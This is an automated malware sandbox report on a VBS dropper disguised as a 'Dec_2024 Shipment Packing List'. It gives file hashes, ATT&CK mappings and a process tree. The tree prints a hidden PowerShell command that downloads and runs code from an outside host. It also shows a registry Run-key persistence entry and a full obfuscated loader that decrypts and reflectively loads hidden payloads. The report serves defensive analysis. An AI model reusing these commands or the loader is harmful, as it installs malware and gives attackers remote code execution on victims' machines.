b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5

General

Target

Dec_2024 Shipment Packing List.vbs
Size

67KB
MD5

0eccd58bd629893c13a11881a4707538
SHA1

0c6eb5b4ca3e92c44ea8b8e9d0841189aeb7d554
SHA256

b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5
SHA512

25a8c044df81bd1e953922f897616eacb615e68e1a0e33d7606c1f4f42913c62826090e5ac4d9a7a62c20284c7206182df3b9999b7704aed692d7933015608b8
SSDEEP

1536:hvakp9tDsWXM2yd+DeYq4Vi5QBCOXU3T18Foc:tJTZrXw+i++cCOXAjc

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2696	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2696	powershell.exe
2972	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2696	2220	WScript.exe	30
PID 2220 wrote to memory of 2696	2220	WScript.exe	30
PID 2220 wrote to memory of 2696	2220	WScript.exe	30
PID 2220 wrote to memory of 1324	2220	WScript.exe	33
PID 2220 wrote to memory of 1324	2220	WScript.exe	33
PID 2220 wrote to memory of 1324	2220	WScript.exe	33
PID 1324 wrote to memory of 584	1324	cmd.exe	35
PID 1324 wrote to memory of 584	1324	cmd.exe	35
PID 1324 wrote to memory of 584	1324	cmd.exe	35
PID 584 wrote to memory of 2960	584	cmd.exe	37
PID 584 wrote to memory of 2960	584	cmd.exe	37
PID 584 wrote to memory of 2960	584	cmd.exe	37
PID 584 wrote to memory of 2972	584	cmd.exe	38
PID 584 wrote to memory of 2972	584	cmd.exe	38
PID 584 wrote to memory of 2972	584	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dec_2024 Shipment Packing List.vbs"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$jPKW='GefLjTtCufLjTrrfLjTentfLjTPrfLjTocfLjTefLjTsfLjTsfLjT'.Replace('fLjT', ''),'DGzhvecoGzhvmGzhvprGzhvesGzhvsGzhv'.Replace('Gzhv', ''),'TrwGpvanwGpvsfwGpvormwGpvFiwGpvnalwGpvBwGpvlowGpvcwGpvkwGpv'.Replace('wGpv', ''),'FrycyWomBycyWaycyWseycyW64ycyWStycyWrinycyWgycyW'.Replace('ycyW', ''),'LOfFmoOfFmadOfFm'.Replace('OfFm', ''),'ElekvoVmekvoVntkvoVAtkvoV'.Replace('kvoV', ''),'MauFSCinMuFSCoduFSCuuFSCluFSCeuFSC'.Replace('uFSC', ''),'CsxmfosxmfpysxmfTosxmf'.Replace('sxmf', ''),'IunLTnvunLTokunLTeunLT'.Replace('unLT', ''),'CreuAMJateuAMJDuAMJecuAMJrypuAMJtouAMJruAMJ'.Replace('uAMJ', ''),'EfIGrntfIGrryfIGrPoifIGrnfIGrtfIGr'.Replace('fIGr', ''),'RedTRKaddTRKLdTRKinedTRKsdTRK'.Replace('dTRK', ''),'CpvtehapvtengepvteExpvtetepvtensipvteonpvte'.Replace('pvte', ''),'SGeUwplGeUwitGeUw'.Replace('GeUw', '');powershell -w hidden;function KFqPw($gImbJ){$prorq=[System.Security.Cryptography.Aes]::Create();$prorq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$prorq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$prorq.Key=[System.Convert]::($jPKW[3])('S1WcM0oi7s1GQUenmEkEPvh6XGAuOA7dB1XSNaO25Eg=');$prorq.IV=[System.Convert]::($jPKW[3])('P2P4FP+QooR5iPseDFqb+g==');$ZXSvs=$prorq.($jPKW[9])();$lcuYL=$ZXSvs.($jPKW[2])($gImbJ,0,$gImbJ.Length);$ZXSvs.Dispose();$prorq.Dispose();$lcuYL;}function aFmgm($gImbJ){$Irchl=New-Object System.IO.MemoryStream(,$gImbJ);$Ylnvr=New-Object System.IO.MemoryStream;$DuOhJ=New-Object System.IO.Compression.GZipStream($Irchl,[IO.Compression.CompressionMode]::($jPKW[1]));$DuOhJ.($jPKW[7])($Ylnvr);$DuOhJ.Dispose();$Irchl.Dispose();$Ylnvr.Dispose();$Ylnvr.ToArray();}$VZjzI=[System.IO.File]::($jPKW[11])([Console]::Title);$UwubA=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 5).Substring(2))));$hRlCy=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 6).Substring(2))));[System.Reflection.Assembly]::($jPKW[4])([byte[]]$hRlCy).($jPKW[10]).($jPKW[8])($null,$null);[System.Reflection.Assembly]::($jPKW[4])([byte[]]$UwubA).($jPKW[10]).($jPKW[8])($null,$null); "
      4⤵
      PID:2960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
c1cffa7be0703f50d79684e9ec4c9069

SHA1
e359431db8731b7e5966463906d6e24df8515744

SHA256
298ce1e8c043395147512b3c7f6e99b2bbfea09fd3c53a4fb34e5f384457f682

SHA512
6eece0756aaf8a65b4a425329a9d0ec0d46f2ae4d13439a453c279560ccda356a24ac501cd4b55570e2caf0dec732ed51ddb69f71cdea936d0052fa9666d258c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d83d158e69f5f9401ec282cb93bd74c6

SHA1
899d91a33f20a7cb2d3d0eb5d1f68e94b6f47db8

SHA256
3baef189a79e57b025d39e00c2e9543a3079d8cd334ab856852ec44dad555444

SHA512
a8d8f3c91b63e4250a628e9b1d9bee23c6f6d465ba1f3148440671e6c426141d606d8e411a501622e19f6e2df63fd1674119c392d4c95dc37458cfa4f3707738

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S4BDMFY2JNRUM8678FCV.temp

Filesize
7KB

MD5
e7e04728b4735bd6df988f6cd05e9cf5

SHA1
a1cfd7e55250be9f980fc457255fb5a5f963215b

SHA256
87e82c87a7ecd6bc91ed444f0901b3b244dec83b94aed02958ea1ec2cd34d96f

SHA512
e4e5cc44f7f2fccc7a3f1a0cf7c05e7d14c03e6fb28189a097ce93a1edef52f56bb5a2e7a58f2693ad06c0028f8654d89d5b997e0737c48e016c8efcee06c3d4

Download Submit
memory/2696-7-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-9-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-8-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-11-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-10-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-12-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-4-0x000007FEF565E000-0x000007FEF565F000-memory.dmp

Filesize
4KB

Download
memory/2696-6-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

Filesize
32KB

Download
memory/2696-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2972-27-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2972-28-0x0000000002250000-0x0000000002258000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads